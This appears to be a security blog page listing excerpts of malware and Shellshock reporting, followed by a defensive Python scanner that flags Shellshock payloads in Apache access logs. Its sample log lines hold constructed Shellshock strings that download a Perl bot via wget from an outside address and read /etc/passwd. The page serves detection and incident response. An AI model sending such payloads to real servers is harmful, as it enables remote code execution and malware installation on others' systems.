
malware

Democracy in Hong Kong Under Attack
Over the last few months, Volexity has been tracking a particularly remarkable advanced persistent threat (APT) operation involving strategic web compromises of websites in Hong Kong and Japan. In both countries, the compromised websites have been particularly notable for their relevance to current events and the high-profile nature of the organizations involved. In particular the Hong Kong comp..

Rustock.B Live Debugging - SwishDbgExt, SysecLabs script.
Here we are, part two! I thought rather than doing a live debugging of runtime2 as I discussed in my last rootkit debugging post, I'd debug a different rootkit. I chose Rustock.B (PE386) as it's a pretty notorious rootkit, and in my opinion is a lot of fun to debug. It's always a great learning experience to debug, reverse, and research things for yourself as well. I have a map of rootkits I want..

Evolution of the Nuclear Exploit Kit
Exploit kits remain an efficient mechanism for cyber criminals to distribute malware. Such kits include exploits for multiple vulnerabilities within a single malicious webpage. Criminals can check operating systems, web browsers and browser plugins for anything that is not fully patched and launch an exploit specific to the out-of-date software. Using this technique criminals can maximise their..

Aided Frame, Aided Direction (Because it's a redirect)
On September 24 2014, FireEye observed a new strategic web compromise (SWC) campaign that we believe is targeting non-profit organizations and non-governmental organizations (NGOs) by hosting iframes on legitimate websites. The compromised websites contained an iframe to direct site visitors to a threat actor-controlled IP address that dropped a Poison Ivy remote access tool (RAT) onto victims' s..

Shellshock in the Wild
The exploitation of the BASH bug, now widely referred to as "Shellshock", is in full swing. Attackers have mobilized: multiple proof-of-concept scripts are available, including a Metasploit module, making this vulnerability very accessible. The ease of exploitation, the simplicity of the vulnerability, and the extremely widespread install base of BASH make this bug so deadly, and show why enterp..

The Shellshock Aftershock for NAS Administrators
FireEye has been monitoring Shellshock-related attacks closely since the vulnerability was first made public last week. Specifically, FireEye has observed attackers attempting to exploit the BASH remote code injection vulnerability against Network Attached Storage (NAS) systems. These attacks result in the attackers having a root-level remote shell, gaining full access to the contents of the NAS...

CryptoWall updated to 2.0
One of this summer's most-followed ransomware families is CryptoWall. Over time CryptoWall has seen minor updates and changes, but its core functionality has stayed pretty much the same. Once a machine has been infected, CryptoWall will attempt to encrypt the contents of the victim's hard drive and then demand a ransom payment in exchange for the decryption key required to get the contents back. T..

Attacks Exploiting Shellshock Confirmed Again, Using IRC Bots
Given the seriousness of "Shellshock", the vulnerability in "Bourne Again shell (bash)", the open-source program used on Linux and other systems, it is no surprise that further attacks exploiting it have been confirmed. A few hours after "Shellshock" was reported, the malware "ELF_BASHLITE.A", which breaks into systems through this vulnerability, was identified. Other malware such as "PERL_SHELLBOT.WZ" and "ELF_BASHLET.A" has also been identified. These samples are able to execute multiple commands, and through them take over PCs or servers. Besides these malware attacks, "distributed denial-of-service (DDoS) attacks" against several well-known institutions have been reported...

Botnet Attacks Confirmed Exploiting the "Shellshock" Vulnerability in bash
One of the consequences expected from "Shellshock", the vulnerability in "Bourne Again shell (bash)", the open-source program used on Linux and other systems, is that cybercriminals and attackers would use it to launch "distributed denial-of-service (DDoS) attacks" against companies or large organizations. This has already become reality: there are reports that some institutions running servers affected by the "Shellshock" vulnerability have suffered attacks carried out by a botnet. A botnet is a network formed from infected PCs and systems. According to Trend Micro's analysis, this backdoor malware, detected as "ELF_BASHWOOP.A", executes the following commands: kill, udp, syn, tcpamp, Jdildos, http, mine, loris. In addition, this malware..

Shellshock Updates: BASHLITE C&Cs Seen, Shellshock Exploit Attempts in Brazil
We have another update regarding the Shellshock vulnerability. In a previous blog entry, we mentioned a DDoS attack against institutions, which depicted the gravity of the vulnerability's real-world impact. Based on our analysis, the backdoor that was used in this DDoS attack is somewhat related to the previous Shellshock exploits we have seen so far. It appears that the various payloads (PERL_..

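The Shellshock entries above (Shellshock in the Wild, the NAS aftershock, and the Trend Micro BASHLITE/BASHWOOP items) describe exploitation of the bash remote code injection bug but do not show what such a request looks like to a defender reading web server logs. The following is an added example, not code from this blog or from any of the vendors quoted: a Python scanner over constructed Apache combined-format access-log lines (the addresses, paths and commands are made up) that flags requests whose User-Agent or Referer header carries the `() { :; };` bash function-definition prefix and extracts the trailing command an unpatched bash would have executed when a CGI script exported that header into the environment.

```python
"""Flag Shellshock-style payloads in Apache combined-format access logs.

Added example for this page; not code from the blog or from the vendors quoted
above. The log lines in SAMPLE_LOG are constructed, using RFC 5737 test
addresses and made-up paths and commands.
"""
import re
from typing import Dict, List, Optional

# Apache "combined" log format. Referer and User-Agent are attacker-controlled
# and reach CGI scripts as the HTTP_REFERER / HTTP_USER_AGENT environment
# variables, which is how a Shellshock payload reached bash.
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock trigger: a value shaped like an exported bash function,
# "() { ...; }", followed by trailing text. Unpatched bash executed that
# trailing text while importing the variable. Whitespace inside the prefix is
# optional, so both "() {" and "(){" match; the trailing command is captured.
SHELLSHOCK = re.compile(r'\(\)\s*\{.*?\}\s*;\s*(?P<cmd>.+)')

SAMPLE_LOG = [
    # benign request (constructed)
    '203.0.113.5 - - [25/Sep/2014:10:01:12 +0000] "GET /index.html HTTP/1.1" '
    '200 1043 "-" "Mozilla/5.0"',
    # ping-back probe in User-Agent against a CGI script (constructed)
    '198.51.100.7 - - [25/Sep/2014:10:02:48 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { :; }; /bin/ping -c 1 198.51.100.7"',
    # downloader using the compact "(){" form, carried in Referer (constructed)
    '198.51.100.9 - - [25/Sep/2014:10:03:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.0" '
    '404 211 "(){ :;}; wget http://198.51.100.9/bot.pl -O /tmp/bot.pl" "-"',
    # same prefix sent to a non-CGI path; still worth recording as a scan (constructed)
    '192.0.2.44 - - [25/Sep/2014:10:04:19 +0000] "GET / HTTP/1.1" '
    '200 1043 "-" "() { ignored; }; echo; /bin/cat /etc/passwd"',
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into its fields, or None if malformed."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def find_shellshock(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line whose Referer or User-Agent carries the
    function-definition prefix. 'cgi' marks requests to /cgi-bin/, where a CGI
    script could have handed the header to bash; other hits are mass scanning."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("agent", "referer"):
            m = SHELLSHOCK.search(rec[field])
            if m:
                findings.append({
                    "src": rec["host"],
                    "path": rec["path"],
                    "field": field,
                    "cmd": m.group("cmd").strip(),
                    "cgi": rec["path"].startswith("/cgi-bin/"),
                })
                break  # one finding per request is enough for triage
    return findings


if __name__ == "__main__":
    for f in find_shellshock(SAMPLE_LOG):
        kind = "exploit attempt" if f["cgi"] else "scan"
        print(f'{f["src"]} {kind} via {f["field"]} on {f["path"]}: {f["cmd"]}')
```

The extracted command is the useful part for response: a ping-back to the scanner's own address is reconnaissance, while a `wget`/`curl` of a Perl or ELF file into `/tmp` matches the BASHLITE and PERL_SHELLBOT droppers described above and tells you which host to block and which file to look for on the NAS or web server.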